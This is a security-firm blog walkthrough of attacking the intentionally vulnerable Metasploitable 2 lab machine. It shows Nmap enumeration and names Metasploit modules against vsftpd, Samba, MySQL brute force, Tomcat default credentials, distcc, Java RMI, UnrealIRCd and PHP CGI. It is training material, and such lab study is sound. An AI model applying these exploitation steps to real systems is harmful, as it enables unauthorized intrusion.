Metasploitable 2 Walkthrough: Quick Exploitation Guide

MongoDB security – Injection attacks with php
June 1, 2016
Firefox 47.0 Memory Access violation Crash – FIXED
July 17, 2016

June 26, 2016

In a recent investigation with Metasploit, fascinating exploits for targeting Metasploitable 2 came to light. The prospect of conducting a Metasploitable 2 walkthrough using Metasploit sparked curiosity. Let’s delve into the methods and motivations behind this exploration.

What is Metasploitable 2

Metasploitable 2 is a Linux virtual machine intentionally designed to be vulnerable to attacks. These virtual machines are commonly used for security training, testing security tools, or practicing various penetration testing techniques.

Getting started

Firstly, to perform the attack on Metaspoitable, we need to carry out the enumeration process on the attacking machine. For this purpose, we have a number of tools available in Kali Linux; most commonly, the use of Nmap and Nikto is done. In our case, we use Nmap. Before moving further, let us have a brief introduction to Nmap.

Namp Overview

Network Mapped (Nmap) is a network scanning and host detection tool that is very useful during several steps of penetration testing. Nmap is not limited to merely gathering information and enumeration. It is also a powerful utility that finds use as a vulnerability detector or a security scanner.

What does Nmap do?

It basically detects:

  • Live host on the network.
  • Open ports on the host.
  • Software and the version to the respective port.
  • Operating system, hardware address, and the software version.

Service and version detection with Nmap

Command: nmap -sS -sV <Victim’s Ip>

  • -sS : SYN Scan
  • -sv : Service and version detection

Service and version detection

As we can see in the above figure, this command provided us with detailed information about the open ports, the various services and their version running on the victim’s machine.Moving further, let us now exploit them one by one.

Exploiting Vulnerabilities

1.VSFTPD (VSFTPD v2.3.4 Backdoor Command Execution)

VSFTPD stands for very secure FTP daemon.It’s a lightweight, stable, and secure FTP server for UNIX-like systems.

So, we use Metasploit to look for the available exploits for VSFTPD. Let us have a look at how we can carry out this search in Metasploit and then apply it to the target machine.

Metasploit

In effect, as we can see in the above snapshot, there is an exploit available for VSFTPD. But wait! Before moving further, are we sure that the exploit is compatible with the versions of running services? This is the key to a successful attack. Firstly, we first confirm whether the exploit is available for the particular versions running on the victim’s machine. You can check the full description of the exploit with the help of the info command.

RHOST

Now that we have ensured the compatibility of the versions, we are ready to use the exploit. Therefore, let us have a look at the available options.

RPORT

Here, RHOST and RPORT are the two options we require. 21 is set as the current value of RPORT, which is for the FTP service. We need to set the value for RHOST, and then we are all set to run this exploit.

RHOST and RPORT

Once you run the exploit, you will get root access. Henceforth, the basic steps that we followed for the attack on VSFTPD will be the same for all the services. So, let us now perform these steps on the other services.

2. SAMBA (Samba “username map script” Command Execution)

Samba is a popular freeware program that allows end users to access and use files, printers, and other commonly shared resources over the Internet. As we saw earlier, the steps we follow for this attack will be the same as the previous one. We use the following exploit to carry out an attack on SAMBA. For further information about this exploit, use the info command.

SAMBA

Now that we have the exploit set, let us set the necessary options and run the exploit.

exploit set

3. MYSQL  (MySQL Login Utility)

MySQL is one of the most popular databases that many applications use nowadays. For the exploitation of MySQL, we first need to find out the database version. Metasploit has a module that we can use to find out the database version. So, we can use the following command for this purpose:

use auxiliary/scanner/mysql/mysql_version

Next, we need to set the RHOST option to be able to use the above command, which we find out by the show options command. Once RHOST is set, we can run the module.

Next, we will use the mysql_login module and try to bruteforce the MYSQL username and password.

MySQL Login Utility

Further, let’s check for the available options for this module.

RHOST option

At times, there is a possibility that the password field for MySQL is left blank. Due to this, we need to set the value of the BLANK_PASSWORDS option.

After this, we need to create two files that contain a list of possible usernames and passwords for MySQL. Once the files are created, we can use them to set the PASS_FILE and USER_FILE options.

Attacking Metasploitable

We can see that, consequently, we were successful in finding the username and password. Let’s now access the victim’s MySQL.

victim’s mysql

4. Tomcat (Apache Tomcat Manager Application Deployer Authenticated Code Execution)

On Metasploitable-2, Tomcat runs on port 8180. This can be exploited with the following metasploit exploit:

Apache Tomcat Manager Application

Tomcat’s default username as well as password are tomcat,although you can also bruteforce it.

Application Deployer Authenticated Code Execution

5. DISTCC (DistCC Daemon Command Execution)

DISTCC is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. Metasploit has an excellent exploit for the DISTCC services.

DistCC Daemon Command Execution

6. GNU Classpath RMI Registry (Java RMI Server Insecure Default Configuration Java Code Execution)

GNU Classpath is a set of essential libraries for supporting the Java programming language.

GNU Classpath RMI Registry

Java RMI Server Insecure Default Configuration

7. UNREAL IRCD (UnrealIRCD 3.2.8.1 Backdoor Command Execution)

UnrealIRCd is an open-source IRC server daemon (IRCD) that allows users to run their own IRC server from their system.

UNREAL IRCD

Backdoor Command Execution

8. Apache (CGI Argument Injection)

The Apache webserver has a vulnerable version of PHP installed which we can find out by visiting /phpinfo.php. This version of PHP is vulnerable to PHP CGI Argument Injection.

CGI Argument Injection

Apache webserver

References:

https://www.offensive-security.com/metasploit-unleashed/

https://community.rapid7.com/docs/DOC-1875

Conclusion

To wrap up, the Metasploitable 2 walkthrough serves as a valuable resource for those interested in cybersecurity. By examining various exploits and their solutions, this guide equips individuals with the knowledge to better protect systems from online threats. It’s a practical way to learn about cybersecurity in today’s digital world. Securelayer7 offers in-depth Penetration Tests using strong research, tools & security experts. Contact us today to schedule your comprehensive penetration test and ensure your systems are secure.

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading

Enable Notifications OK No thanks